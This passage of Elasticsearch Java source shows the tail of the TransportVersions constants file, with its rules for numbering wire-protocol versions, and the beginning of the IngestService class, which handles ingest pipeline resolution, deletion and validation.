public static final TransportVersion V_7_16_0 = def(7_16_00_99);
public static final TransportVersion V_7_17_0 = def(7_17_00_99);
public static final TransportVersion V_7_17_1 = def(7_17_01_99);
public static final TransportVersion V_7_17_8 = def(7_17_08_99);
public static final TransportVersion V_8_0_0 = def(8_00_00_99);
public static final TransportVersion V_8_1_0 = def(8_01_00_99);
public static final TransportVersion V_8_2_0 = def(8_02_00_99);
public static final TransportVersion V_8_3_0 = def(8_03_00_99);
public static final TransportVersion V_8_4_0 = def(8_04_00_99);
public static final TransportVersion V_8_5_0 = def(8_05_00_99);
public static final TransportVersion V_8_6_0 = def(8_06_00_99);
public static final TransportVersion V_8_6_1 = def(8_06_01_99);
public static final TransportVersion V_8_7_0 = def(8_07_00_99);
public static final TransportVersion V_8_7_1 = def(8_07_01_99);
public static final TransportVersion V_8_8_0 = def(8_08_00_99);
public static final TransportVersion V_8_8_1 = def(8_08_01_99);
/*
* READ THE COMMENT BELOW THIS BLOCK OF DECLARATIONS BEFORE ADDING NEW TRANSPORT VERSIONS
* Detached transport versions added below here.
*/
public static final TransportVersion V_8_9_X = def(8_500_020);
public static final TransportVersion V_8_10_X = def(8_500_061);
public static final TransportVersion V_8_11_X = def(8_512_00_1);
public static final TransportVersion V_8_12_0 = def(8_560_00_0);
public static final TransportVersion V_8_12_1 = def(8_560_00_1);
public static final TransportVersion V_8_13_0 = def(8_595_00_0);
public static final TransportVersion V_8_13_4 = def(8_595_00_1);
// 8.14.0+
public static final TransportVersion RANDOM_AGG_SHARD_SEED = def(8_596_00_0);
public static final TransportVersion ESQL_TIMINGS = def(8_597_00_0);
public static final TransportVersion DATA_STREAM_AUTO_SHARDING_EVENT = def(8_598_00_0);
public static final TransportVersion ADD_FAILURE_STORE_INDICES_OPTIONS = def(8_599_00_0);
public static final TransportVersion ESQL_ENRICH_OPERATOR_STATUS = def(8_600_00_0);
public static final TransportVersion ESQL_SERIALIZE_ARRAY_VECTOR = def(8_601_00_0);
public static final TransportVersion ESQL_SERIALIZE_ARRAY_BLOCK = def(8_602_00_0);
public static final TransportVersion ADD_DATA_STREAM_GLOBAL_RETENTION = def(8_603_00_0);
public static final TransportVersion ALLOCATION_STATS = def(8_604_00_0);
public static final TransportVersion ESQL_EXTENDED_ENRICH_TYPES = def(8_605_00_0);
public static final TransportVersion KNN_EXPLICIT_BYTE_QUERY_VECTOR_PARSING = def(8_606_00_0);
public static final TransportVersion ESQL_EXTENDED_ENRICH_INPUT_TYPE = def(8_607_00_0);
public static final TransportVersion ESQL_SERIALIZE_BIG_VECTOR = def(8_608_00_0);
public static final TransportVersion AGGS_EXCLUDED_DELETED_DOCS = def(8_609_00_0);
public static final TransportVersion ESQL_SERIALIZE_BIG_ARRAY = def(8_610_00_0);
public static final TransportVersion AUTO_SHARDING_ROLLOVER_CONDITION = def(8_611_00_0);
public static final TransportVersion KNN_QUERY_VECTOR_BUILDER = def(8_612_00_0);
public static final TransportVersion USE_DATA_STREAM_GLOBAL_RETENTION = def(8_613_00_0);
public static final TransportVersion ML_COMPLETION_INFERENCE_SERVICE_ADDED = def(8_614_00_0);
public static final TransportVersion ML_INFERENCE_EMBEDDING_BYTE_ADDED = def(8_615_00_0);
public static final TransportVersion ML_INFERENCE_L2_NORM_SIMILARITY_ADDED = def(8_616_00_0);
public static final TransportVersion SEARCH_NODE_LOAD_AUTOSCALING = def(8_617_00_0);
public static final TransportVersion ESQL_ES_SOURCE_OPTIONS = def(8_618_00_0);
public static final TransportVersion ADD_PERSISTENT_TASK_EXCEPTIONS = def(8_619_00_0);
public static final TransportVersion ESQL_REDUCER_NODE_FRAGMENT = def(8_620_00_0);
public static final TransportVersion FAILURE_STORE_ROLLOVER = def(8_621_00_0);
public static final TransportVersion CCR_STATS_API_TIMEOUT_PARAM = def(8_622_00_0);
public static final TransportVersion ESQL_ORDINAL_BLOCK = def(8_623_00_0);
public static final TransportVersion ML_INFERENCE_COHERE_RERANK = def(8_624_00_0);
public static final TransportVersion INDEXING_PRESSURE_DOCUMENT_REJECTIONS_COUNT = def(8_625_00_0);
public static final TransportVersion ALIAS_ACTION_RESULTS = def(8_626_00_0);
public static final TransportVersion HISTOGRAM_AGGS_KEY_SORTED = def(8_627_00_0);
public static final TransportVersion INFERENCE_FIELDS_METADATA = def(8_628_00_0);
public static final TransportVersion ML_INFERENCE_TIMEOUT_ADDED = def(8_629_00_0);
public static final TransportVersion MODIFY_DATA_STREAM_FAILURE_STORES = def(8_630_00_0);
public static final TransportVersion ML_INFERENCE_RERANK_NEW_RESPONSE_FORMAT = def(8_631_00_0);
public static final TransportVersion HIGHLIGHTERS_TAGS_ON_FIELD_LEVEL = def(8_632_00_0);
public static final TransportVersion TRACK_FLUSH_TIME_EXCLUDING_WAITING_ON_LOCKS = def(8_633_00_0);
public static final TransportVersion ML_INFERENCE_AZURE_OPENAI_EMBEDDINGS = def(8_634_00_0);
public static final TransportVersion ILM_SHRINK_ENABLE_WRITE = def(8_635_00_0);
public static final TransportVersion GEOIP_CACHE_STATS = def(8_636_00_0);
public static final TransportVersion SHUTDOWN_REQUEST_TIMEOUTS_FIX_8_14 = def(8_636_00_1);
public static final TransportVersion WATERMARK_THRESHOLDS_STATS = def(8_637_00_0);
public static final TransportVersion ENRICH_CACHE_ADDITIONAL_STATS = def(8_638_00_0);
public static final TransportVersion ML_INFERENCE_RATE_LIMIT_SETTINGS_ADDED = def(8_639_00_0);
public static final TransportVersion ML_TRAINED_MODEL_CACHE_METADATA_ADDED = def(8_640_00_0);
public static final TransportVersion TOP_LEVEL_KNN_SUPPORT_QUERY_NAME = def(8_641_00_0);
public static final TransportVersion INDEX_SEGMENTS_VECTOR_FORMATS = def(8_642_00_0);
public static final TransportVersion ADD_RESOURCE_ALREADY_UPLOADED_EXCEPTION = def(8_643_00_0);
public static final TransportVersion ESQL_MV_ORDERING_SORTED_ASCENDING = def(8_644_00_0);
public static final TransportVersion ESQL_PAGE_MAPPING_TO_ITERATOR = def(8_645_00_0);
public static final TransportVersion BINARY_PIT_ID = def(8_646_00_0);
public static final TransportVersion SECURITY_ROLE_MAPPINGS_IN_CLUSTER_STATE = def(8_647_00_0);
public static final TransportVersion ESQL_REQUEST_TABLES = def(8_648_00_0);
public static final TransportVersion ROLE_REMOTE_CLUSTER_PRIVS = def(8_649_00_0);
public static final TransportVersion NO_GLOBAL_RETENTION_FOR_SYSTEM_DATA_STREAMS = def(8_650_00_0);
public static final TransportVersion SHUTDOWN_REQUEST_TIMEOUTS_FIX = def(8_651_00_0);
public static final TransportVersion INDEXING_PRESSURE_REQUEST_REJECTIONS_COUNT = def(8_652_00_0);
public static final TransportVersion ROLLUP_USAGE = def(8_653_00_0);
public static final TransportVersion SECURITY_ROLE_DESCRIPTION = def(8_654_00_0);
public static final TransportVersion ML_INFERENCE_AZURE_OPENAI_COMPLETIONS = def(8_655_00_0);
public static final TransportVersion JOIN_STATUS_AGE_SERIALIZATION = def(8_656_00_0);
public static final TransportVersion ML_RERANK_DOC_OPTIONAL = def(8_657_00_0);
/*
* STOP! READ THIS FIRST! No, really,
* ____ _____ ___ ____ _ ____ _____ _ ____ _____ _ _ ___ ____ _____ ___ ____ ____ _____ _
* / ___|_ _/ _ \| _ \| | | _ \| ____| / \ | _ \ |_ _| | | |_ _/ ___| | ___|_ _| _ \/ ___|_ _| |
* \___ \ | || | | | |_) | | | |_) | _| / _ \ | | | | | | | |_| || |\___ \ | |_ | || |_) \___ \ | | | |
* ___) || || |_| | __/|_| | _ <| |___ / ___ \| |_| | | | | _ || | ___) | | _| | || _ < ___) || | |_|
* |____/ |_| \___/|_| (_) |_| \_\_____/_/ \_\____/ |_| |_| |_|___|____/ |_| |___|_| \_\____/ |_| (_)
*
* A new transport version should be added EVERY TIME a change is made to the serialization protocol of one or more classes. Each
* transport version should only be used in a single merged commit (apart from the BwC versions copied from o.e.Version, ≤V_8_8_1).
*
* ADDING A TRANSPORT VERSION
* To add a new transport version, add a new constant at the bottom of the list, above this comment. Don't add other lines,
* comments, etc. The version id has the following layout:
*
* M_NNN_SS_P
*
* M - The major version of Elasticsearch
* NNN - The server version part
* SS - The serverless version part. It should always be 00 here, it is used by serverless only.
* P - The patch version part
*
* To determine the id of the next TransportVersion constant, do the following:
* - Use the same major version, unless bumping majors
* - Bump the server version part by 1, unless creating a patch version
* - Leave the serverless part as 00
* - Bump the patch part if creating a patch version
*
* If a patch version is created, it should be placed sorted among the other existing constants.
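*
* For example (hypothetical constant name, for illustration only): given that the newest entry
* above is
*
*   public static final TransportVersion ML_RERANK_DOC_OPTIONAL = def(8_657_00_0);
*
* the next server-side wire change would add a constant with def(8_658_00_0), and a later patch
* of that same change on a release branch would use def(8_658_00_1), inserted in sorted order.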
*
* REVERTING A TRANSPORT VERSION
*
* If you revert a commit with a transport version change, you MUST ensure there is a NEW transport version representing the reverted
* change. DO NOT let the transport version go backwards, it must ALWAYS be incremented.
*
* DETERMINING TRANSPORT VERSIONS FROM GIT HISTORY
*
* If your git checkout has the expected minor-version-numbered branches and the expected release-version tags then you can find the
* transport versions known by a particular release ...
*
* git show v8.11.0:server/src/main/java/org/elasticsearch/TransportVersions.java | grep '= def'
*
* ... or by a particular branch ...
*
* git show 8.11:server/src/main/java/org/elasticsearch/TransportVersions.java | grep '= def'
*
* ... and you can see which versions were added in between two versions too ...
*
* git diff v8.11.0..main -- server/src/main/java/org/elasticsearch/TransportVersions.java
*
* In branches 8.7-8.10 see server/src/main/java/org/elasticsearch/TransportVersion.java for the equivalent definitions.
*/
/**
* Reference to the earliest compatible transport version to this version of the codebase.
* This should be the transport version used by the highest minor version of the previous major.
*/
public static final TransportVersion MINIMUM_COMPATIBLE = V_7_17_0;
/**
* Reference to the minimum transport version that can be used with CCS.
* This should be the transport version used by the previous minor release.
*/
public static final TransportVersion MINIMUM_CCS_VERSION = V_8_13_0;
static final NavigableMap<Integer, TransportVersion> VERSION_IDS = getAllVersionIds(TransportVersions.class);
// the highest transport version constant defined in this file, used as a fallback for TransportVersion.current()
static final TransportVersion LATEST_DEFINED;
static {
LATEST_DEFINED = VERSION_IDS.lastEntry().getValue();
// see comment on IDS field
// now we've registered all the transport versions, we can clear the set
IDS = null;
}
public static NavigableMap<Integer, TransportVersion> getAllVersionIds(Class<?> cls) {
Map<Integer, String> versionIdFields = new HashMap<>();
NavigableMap<Integer, TransportVersion> builder = new TreeMap<>();
Set<String> ignore = Set.of("ZERO", "CURRENT", "MINIMUM_COMPATIBLE", "MINIMUM_CCS_VERSION");
for (Field declaredField : cls.getFields()) {
if (declaredField.getType().equals(TransportVersion.class)) {
String fieldName = declaredField.getName();
if (ignore.contains(fieldName)) {
continue;
}
TransportVersion version;
try {
version = (TransportVersion) declaredField.get(null);
} catch (IllegalAccessException e) {
throw new AssertionError(e);
}
builder.put(version.id(), version);
if (Assertions.ENABLED) {
// check the version number is unique
var sameVersionNumber = versionIdFields.put(version.id(), fieldName);
assert sameVersionNumber == null
: "Versions ["
+ sameVersionNumber
+ "] and ["
+ fieldName
+ "] have the same version number ["
+ version.id()
+ "]. Each TransportVersion should have a different version number";
}
}
}
return Collections.unmodifiableNavigableMap(builder);
}
static Collection<TransportVersion> getAllVersions() {
return VERSION_IDS.values();
}
static final IntFunction<String> VERSION_LOOKUP = ReleaseVersions.generateVersionsLookup(TransportVersions.class);
// no instance
private TransportVersions() {}
}
| mhl-b/elasticsearch | server/src/main/java/org/elasticsearch/TransportVersions.java |
1,024 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.ingest;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.util.Strings;
import org.elasticsearch.ElasticsearchParseException;
import org.elasticsearch.ExceptionsHelper;
import org.elasticsearch.ResourceNotFoundException;
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.action.DocWriteRequest;
import org.elasticsearch.action.admin.cluster.node.info.NodeInfo;
import org.elasticsearch.action.admin.cluster.node.info.NodesInfoResponse;
import org.elasticsearch.action.bulk.TransportBulkAction;
import org.elasticsearch.action.index.IndexRequest;
import org.elasticsearch.action.ingest.DeletePipelineRequest;
import org.elasticsearch.action.ingest.PutPipelineRequest;
import org.elasticsearch.action.support.RefCountingRunnable;
import org.elasticsearch.action.support.master.AcknowledgedResponse;
import org.elasticsearch.client.internal.Client;
import org.elasticsearch.cluster.ClusterChangedEvent;
import org.elasticsearch.cluster.ClusterState;
import org.elasticsearch.cluster.ClusterStateApplier;
import org.elasticsearch.cluster.ClusterStateTaskExecutor;
import org.elasticsearch.cluster.ClusterStateTaskListener;
import org.elasticsearch.cluster.metadata.DataStream;
import org.elasticsearch.cluster.metadata.IndexAbstraction;
import org.elasticsearch.cluster.metadata.IndexMetadata;
import org.elasticsearch.cluster.metadata.IndexNameExpressionResolver;
import org.elasticsearch.cluster.metadata.IndexTemplateMetadata;
import org.elasticsearch.cluster.metadata.Metadata;
import org.elasticsearch.cluster.metadata.MetadataIndexTemplateService;
import org.elasticsearch.cluster.node.DiscoveryNode;
import org.elasticsearch.cluster.service.ClusterService;
import org.elasticsearch.cluster.service.MasterServiceTaskQueue;
import org.elasticsearch.common.Priority;
import org.elasticsearch.common.TriConsumer;
import org.elasticsearch.common.bytes.BytesReference;
import org.elasticsearch.common.regex.Regex;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.common.util.CollectionUtils;
import org.elasticsearch.common.util.concurrent.AbstractRunnable;
import org.elasticsearch.common.xcontent.XContentHelper;
import org.elasticsearch.core.Nullable;
import org.elasticsearch.core.Releasable;
import org.elasticsearch.core.TimeValue;
import org.elasticsearch.core.Tuple;
import org.elasticsearch.env.Environment;
import org.elasticsearch.gateway.GatewayService;
import org.elasticsearch.grok.MatcherWatchdog;
import org.elasticsearch.index.IndexSettings;
import org.elasticsearch.index.VersionType;
import org.elasticsearch.index.analysis.AnalysisRegistry;
import org.elasticsearch.node.ReportingService;
import org.elasticsearch.plugins.IngestPlugin;
import org.elasticsearch.plugins.internal.DocumentParsingProvider;
import org.elasticsearch.plugins.internal.DocumentSizeObserver;
import org.elasticsearch.script.ScriptService;
import org.elasticsearch.threadpool.Scheduler;
import org.elasticsearch.threadpool.ThreadPool;
import org.elasticsearch.xcontent.XContentBuilder;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.Objects;
import java.util.Optional;
import java.util.Set;
import java.util.TreeMap;
import java.util.concurrent.CopyOnWriteArrayList;
import java.util.concurrent.Executor;
import java.util.function.BiConsumer;
import java.util.function.BiFunction;
import java.util.function.Consumer;
import java.util.function.IntConsumer;
import java.util.function.Predicate;
import java.util.stream.Collectors;
import static org.elasticsearch.core.Strings.format;
/**
* Holder class for several ingest related services.
*/
public class IngestService implements ClusterStateApplier, ReportingService<IngestInfo> {
public static final String NOOP_PIPELINE_NAME = "_none";
public static final String INGEST_ORIGIN = "ingest";
private static final Logger logger = LogManager.getLogger(IngestService.class);
private final MasterServiceTaskQueue<PipelineClusterStateUpdateTask> taskQueue;
private final ClusterService clusterService;
private final ScriptService scriptService;
private final DocumentParsingProvider documentParsingProvider;
private final Map<String, Processor.Factory> processorFactories;
// Ideally this should be in IngestMetadata class, but we don't have the processor factories around there.
    // We know of all the processor factories only once a node with all its plugins has been initialized. Also, some
// processor factories rely on other node services. Custom metadata is statically registered when classes
// are loaded, so in the cluster state we just save the pipeline config and here we keep the actual pipelines around.
private volatile Map<String, PipelineHolder> pipelines = Map.of();
private final ThreadPool threadPool;
private final IngestMetric totalMetrics = new IngestMetric();
private final List<Consumer<ClusterState>> ingestClusterStateListeners = new CopyOnWriteArrayList<>();
private volatile ClusterState state;
private static BiFunction<Long, Runnable, Scheduler.ScheduledCancellable> createScheduler(ThreadPool threadPool) {
return (delay, command) -> threadPool.schedule(command, TimeValue.timeValueMillis(delay), threadPool.generic());
}
public static MatcherWatchdog createGrokThreadWatchdog(Environment env, ThreadPool threadPool) {
final Settings settings = env.settings();
final BiFunction<Long, Runnable, Scheduler.ScheduledCancellable> scheduler = createScheduler(threadPool);
long intervalMillis = IngestSettings.GROK_WATCHDOG_INTERVAL.get(settings).getMillis();
        long maxExecutionTimeMillis = IngestSettings.GROK_WATCHDOG_MAX_EXECUTION_TIME.get(settings).getMillis();
return MatcherWatchdog.newInstance(intervalMillis, maxExecutionTimeMillis, threadPool::relativeTimeInMillis, scheduler::apply);
}
/**
* Cluster state task executor for ingest pipeline operations
*/
static final ClusterStateTaskExecutor<PipelineClusterStateUpdateTask> PIPELINE_TASK_EXECUTOR = batchExecutionContext -> {
final var allIndexMetadata = batchExecutionContext.initialState().metadata().indices().values();
final IngestMetadata initialIngestMetadata = batchExecutionContext.initialState().metadata().custom(IngestMetadata.TYPE);
var currentIngestMetadata = initialIngestMetadata;
for (final var taskContext : batchExecutionContext.taskContexts()) {
try {
final var task = taskContext.getTask();
try (var ignored = taskContext.captureResponseHeaders()) {
currentIngestMetadata = task.execute(currentIngestMetadata, allIndexMetadata);
}
taskContext.success(() -> task.listener.onResponse(AcknowledgedResponse.TRUE));
} catch (Exception e) {
taskContext.onFailure(e);
}
}
final var finalIngestMetadata = currentIngestMetadata;
return finalIngestMetadata == initialIngestMetadata
? batchExecutionContext.initialState()
: batchExecutionContext.initialState().copyAndUpdateMetadata(b -> b.putCustom(IngestMetadata.TYPE, finalIngestMetadata));
};
/**
* Specialized cluster state update task specifically for ingest pipeline operations.
* These operations all receive an AcknowledgedResponse.
*/
public abstract static class PipelineClusterStateUpdateTask implements ClusterStateTaskListener {
final ActionListener<AcknowledgedResponse> listener;
PipelineClusterStateUpdateTask(ActionListener<AcknowledgedResponse> listener) {
this.listener = listener;
}
public abstract IngestMetadata execute(IngestMetadata currentIngestMetadata, Collection<IndexMetadata> allIndexMetadata);
@Override
public void onFailure(Exception e) {
listener.onFailure(e);
}
}
@SuppressWarnings("this-escape")
public IngestService(
ClusterService clusterService,
ThreadPool threadPool,
Environment env,
ScriptService scriptService,
AnalysisRegistry analysisRegistry,
List<IngestPlugin> ingestPlugins,
Client client,
MatcherWatchdog matcherWatchdog,
DocumentParsingProvider documentParsingProvider
) {
this.clusterService = clusterService;
this.scriptService = scriptService;
this.documentParsingProvider = documentParsingProvider;
this.processorFactories = processorFactories(
ingestPlugins,
new Processor.Parameters(
env,
scriptService,
analysisRegistry,
threadPool.getThreadContext(),
threadPool::relativeTimeInMillis,
createScheduler(threadPool),
this,
client,
threadPool.generic()::execute,
matcherWatchdog
)
);
this.threadPool = threadPool;
this.taskQueue = clusterService.createTaskQueue("ingest-pipelines", Priority.NORMAL, PIPELINE_TASK_EXECUTOR);
}
    /**
     * This copy constructor returns a copy of the given ingestService, using all of the same internal state. The returned copy is not
     * registered to listen to any cluster state changes.
     *
     * @param ingestService the existing ingest service to copy
     */
IngestService(IngestService ingestService) {
this.clusterService = ingestService.clusterService;
this.scriptService = ingestService.scriptService;
this.documentParsingProvider = ingestService.documentParsingProvider;
this.processorFactories = ingestService.processorFactories;
this.threadPool = ingestService.threadPool;
this.taskQueue = ingestService.taskQueue;
this.pipelines = ingestService.pipelines;
this.state = ingestService.state;
}
private static Map<String, Processor.Factory> processorFactories(List<IngestPlugin> ingestPlugins, Processor.Parameters parameters) {
Map<String, Processor.Factory> processorFactories = new TreeMap<>();
for (IngestPlugin ingestPlugin : ingestPlugins) {
Map<String, Processor.Factory> newProcessors = ingestPlugin.getProcessors(parameters);
for (Map.Entry<String, Processor.Factory> entry : newProcessors.entrySet()) {
if (processorFactories.put(entry.getKey(), entry.getValue()) != null) {
throw new IllegalArgumentException("Ingest processor [" + entry.getKey() + "] is already registered");
}
}
}
logger.debug("registered ingest processor types: {}", processorFactories.keySet());
return Map.copyOf(processorFactories);
}
/**
     * Resolves the potential pipelines (default and final) from the request or the templates associated with the index, and then **mutates**
     * the {@link org.elasticsearch.action.index.IndexRequest} passed in with the pipeline information.
     * <p>
     * This method also marks the request as `isPipelinesResolved = true`: because the request could be rerouted from a coordinating node
     * to an ingest node, we must avoid resolving the pipelines twice, and we must be able to distinguish whether the pipeline came as
     * part of the request or was resolved by this method. This later allows rejecting the request when the pipeline was set by a
     * required pipeline **and** the request also specifies its own pipeline.
*
* @param originalRequest Original write request received.
* @param indexRequest The {@link org.elasticsearch.action.index.IndexRequest} object to update.
* @param metadata Cluster metadata from where the pipeline information could be derived.
*/
public static void resolvePipelinesAndUpdateIndexRequest(
final DocWriteRequest<?> originalRequest,
final IndexRequest indexRequest,
final Metadata metadata
) {
resolvePipelinesAndUpdateIndexRequest(originalRequest, indexRequest, metadata, System.currentTimeMillis());
}
static void resolvePipelinesAndUpdateIndexRequest(
final DocWriteRequest<?> originalRequest,
final IndexRequest indexRequest,
final Metadata metadata,
final long epochMillis
) {
if (indexRequest.isPipelineResolved()) {
return;
}
String requestPipeline = indexRequest.getPipeline();
Pipelines pipelines = resolvePipelinesFromMetadata(originalRequest, indexRequest, metadata, epochMillis) //
.or(() -> resolvePipelinesFromIndexTemplates(indexRequest, metadata))
.orElse(Pipelines.NO_PIPELINES_DEFINED);
// The pipeline coming as part of the request always has priority over the resolved one from metadata or templates
if (requestPipeline != null) {
indexRequest.setPipeline(requestPipeline);
} else {
indexRequest.setPipeline(pipelines.defaultPipeline);
}
indexRequest.setFinalPipeline(pipelines.finalPipeline);
indexRequest.isPipelineResolved(true);
}
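    // Illustrative sketch (index and pipeline names are hypothetical): an explicit request pipeline always wins over the
    // resolved default, while the final pipeline still comes from the index settings or templates, e.g.
    //   IndexRequest request = new IndexRequest("logs-app");
    //   request.setPipeline("my-pipeline");
    //   IngestService.resolvePipelinesAndUpdateIndexRequest(request, request, clusterState.metadata());
    //   // request.getPipeline() == "my-pipeline" even if the index defines index.default_pipeline,
    //   // and request.getFinalPipeline() reflects index.final_pipeline (or "_none" if unset).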
public ClusterService getClusterService() {
return clusterService;
}
public ScriptService getScriptService() {
return scriptService;
}
/**
* Deletes the pipeline specified by id in the request.
*/
public void delete(DeletePipelineRequest request, ActionListener<AcknowledgedResponse> listener) {
taskQueue.submitTask(
"delete-pipeline-" + request.getId(),
new DeletePipelineClusterStateUpdateTask(listener, request),
request.masterNodeTimeout()
);
}
/**
* Used by this class and {@link org.elasticsearch.action.ingest.ReservedPipelineAction}
*/
public static class DeletePipelineClusterStateUpdateTask extends PipelineClusterStateUpdateTask {
private final DeletePipelineRequest request;
DeletePipelineClusterStateUpdateTask(ActionListener<AcknowledgedResponse> listener, DeletePipelineRequest request) {
super(listener);
this.request = request;
}
/**
* Used by the {@link org.elasticsearch.action.ingest.ReservedPipelineAction}
*/
public DeletePipelineClusterStateUpdateTask(String id) {
this(null, new DeletePipelineRequest(id));
}
@Override
public IngestMetadata execute(IngestMetadata currentIngestMetadata, Collection<IndexMetadata> allIndexMetadata) {
if (currentIngestMetadata == null) {
return null;
}
Map<String, PipelineConfiguration> pipelines = currentIngestMetadata.getPipelines();
Set<String> toRemove = new HashSet<>();
for (String pipelineKey : pipelines.keySet()) {
if (Regex.simpleMatch(request.getId(), pipelineKey)) {
toRemove.add(pipelineKey);
}
}
if (toRemove.isEmpty() && Regex.isMatchAllPattern(request.getId()) == false) {
throw new ResourceNotFoundException("pipeline [{}] is missing", request.getId());
} else if (toRemove.isEmpty()) {
return currentIngestMetadata;
}
final Map<String, PipelineConfiguration> pipelinesCopy = new HashMap<>(pipelines);
for (String key : toRemove) {
validateNotInUse(key, allIndexMetadata);
pipelinesCopy.remove(key);
}
return new IngestMetadata(pipelinesCopy);
}
}
static void validateNotInUse(String pipeline, Collection<IndexMetadata> allIndexMetadata) {
List<String> defaultPipelineIndices = new ArrayList<>();
List<String> finalPipelineIndices = new ArrayList<>();
for (IndexMetadata indexMetadata : allIndexMetadata) {
String defaultPipeline = IndexSettings.DEFAULT_PIPELINE.get(indexMetadata.getSettings());
String finalPipeline = IndexSettings.FINAL_PIPELINE.get(indexMetadata.getSettings());
if (pipeline.equals(defaultPipeline)) {
defaultPipelineIndices.add(indexMetadata.getIndex().getName());
}
if (pipeline.equals(finalPipeline)) {
finalPipelineIndices.add(indexMetadata.getIndex().getName());
}
}
if (defaultPipelineIndices.size() > 0 || finalPipelineIndices.size() > 0) {
throw new IllegalArgumentException(
String.format(
Locale.ROOT,
"pipeline [%s] cannot be deleted because it is %s%s%s",
pipeline,
defaultPipelineIndices.size() > 0
? String.format(
Locale.ROOT,
"the default pipeline for %s index(es) including [%s]",
defaultPipelineIndices.size(),
defaultPipelineIndices.stream().sorted().limit(3).collect(Collectors.joining(","))
)
: Strings.EMPTY,
defaultPipelineIndices.size() > 0 && finalPipelineIndices.size() > 0 ? " and " : Strings.EMPTY,
finalPipelineIndices.size() > 0
? String.format(
Locale.ROOT,
"the final pipeline for %s index(es) including [%s]",
finalPipelineIndices.size(),
finalPipelineIndices.stream().sorted().limit(3).collect(Collectors.joining(","))
)
: Strings.EMPTY
)
);
}
}
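    // Illustrative example (index and pipeline names are hypothetical): deleting pipeline "logs-default" while an index
    // still declares "index.default_pipeline": "logs-default" is rejected with a message along the lines of
    // "pipeline [logs-default] cannot be deleted because it is the default pipeline for 1 index(es) including [logs-2024]".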
/**
     * @return pipeline configuration(s) specified by id. If multiple ids or wildcards are specified, multiple pipelines
     * may be returned.
*/
    // Returning PipelineConfiguration instead of Pipeline, because the Pipeline and Processor interfaces don't
    // know how to serialize themselves.
public static List<PipelineConfiguration> getPipelines(ClusterState clusterState, String... ids) {
IngestMetadata ingestMetadata = clusterState.getMetadata().custom(IngestMetadata.TYPE);
return innerGetPipelines(ingestMetadata, ids);
}
static List<PipelineConfiguration> innerGetPipelines(IngestMetadata ingestMetadata, String... ids) {
if (ingestMetadata == null) {
return List.of();
}
// if we didn't ask for _any_ ID, then we get them all (this is the same as if they ask for '*')
if (ids.length == 0) {
return new ArrayList<>(ingestMetadata.getPipelines().values());
}
List<PipelineConfiguration> result = new ArrayList<>(ids.length);
for (String id : ids) {
if (Regex.isSimpleMatchPattern(id)) {
for (Map.Entry<String, PipelineConfiguration> entry : ingestMetadata.getPipelines().entrySet()) {
if (Regex.simpleMatch(id, entry.getKey())) {
result.add(entry.getValue());
}
}
} else {
PipelineConfiguration pipeline = ingestMetadata.getPipelines().get(id);
if (pipeline != null) {
result.add(pipeline);
}
}
}
return result;
}
/**
* Stores the specified pipeline definition in the request.
*/
public void putPipeline(
PutPipelineRequest request,
ActionListener<AcknowledgedResponse> listener,
Consumer<ActionListener<NodesInfoResponse>> nodeInfoListener
) throws Exception {
if (isNoOpPipelineUpdate(state, request)) {
// existing pipeline matches request pipeline -- no need to update
listener.onResponse(AcknowledgedResponse.TRUE);
return;
}
nodeInfoListener.accept(listener.delegateFailureAndWrap((l, nodeInfos) -> {
validatePipelineRequest(request, nodeInfos);
taskQueue.submitTask(
"put-pipeline-" + request.getId(),
new PutPipelineClusterStateUpdateTask(l, request),
request.masterNodeTimeout()
);
}));
}
public void validatePipelineRequest(PutPipelineRequest request, NodesInfoResponse nodeInfos) throws Exception {
final Map<String, Object> config = XContentHelper.convertToMap(request.getSource(), false, request.getXContentType()).v2();
Map<DiscoveryNode, IngestInfo> ingestInfos = new HashMap<>();
for (NodeInfo nodeInfo : nodeInfos.getNodes()) {
ingestInfos.put(nodeInfo.getNode(), nodeInfo.getInfo(IngestInfo.class));
}
validatePipeline(ingestInfos, request.getId(), config);
}
public static boolean isNoOpPipelineUpdate(ClusterState state, PutPipelineRequest request) {
IngestMetadata currentIngestMetadata = state.metadata().custom(IngestMetadata.TYPE);
if (request.getVersion() == null
&& currentIngestMetadata != null
&& currentIngestMetadata.getPipelines().containsKey(request.getId())) {
var pipelineConfig = XContentHelper.convertToMap(request.getSource(), false, request.getXContentType()).v2();
var currentPipeline = currentIngestMetadata.getPipelines().get(request.getId());
if (currentPipeline.getConfigAsMap().equals(pipelineConfig)) {
return true;
}
}
return false;
}
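    // Put another way: re-PUTting a pipeline whose parsed config map equals the stored one, and which carries no explicit
    // version precondition, is treated as a no-op and acknowledged without submitting a cluster state update task.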
/**
* Returns the pipeline by the specified id
*/
public Pipeline getPipeline(String id) {
if (id == null) {
return null;
}
PipelineHolder holder = pipelines.get(id);
if (holder != null) {
return holder.pipeline;
} else {
return null;
}
}
public Map<String, Processor.Factory> getProcessorFactories() {
return processorFactories;
}
@Override
public IngestInfo info() {
Map<String, Processor.Factory> processorFactories = getProcessorFactories();
List<ProcessorInfo> processorInfoList = new ArrayList<>(processorFactories.size());
for (Map.Entry<String, Processor.Factory> entry : processorFactories.entrySet()) {
processorInfoList.add(new ProcessorInfo(entry.getKey()));
}
return new IngestInfo(processorInfoList);
}
Map<String, PipelineHolder> pipelines() {
return pipelines;
}
/**
* Recursive method to obtain all the non-failure processors for given compoundProcessor.
* <p>
* 'if' and 'ignore_failure'/'on_failure' are implemented as wrappers around the actual processor (via {@link ConditionalProcessor}
* and {@link OnFailureProcessor}, respectively), so we unwrap these processors internally in order to expose the underlying
* 'actual' processor via the metrics. This corresponds best to the customer intent -- e.g. they used a 'set' processor that has an
* 'on_failure', so we report metrics for the set processor, not an on_failure processor.
*
* @param compoundProcessor The compound processor to start walking the non-failure processors
* @param processorMetrics The list to populate with {@link Processor} {@link IngestMetric} tuples.
*/
private static void collectProcessorMetrics(
CompoundProcessor compoundProcessor,
List<Tuple<Processor, IngestMetric>> processorMetrics
) {
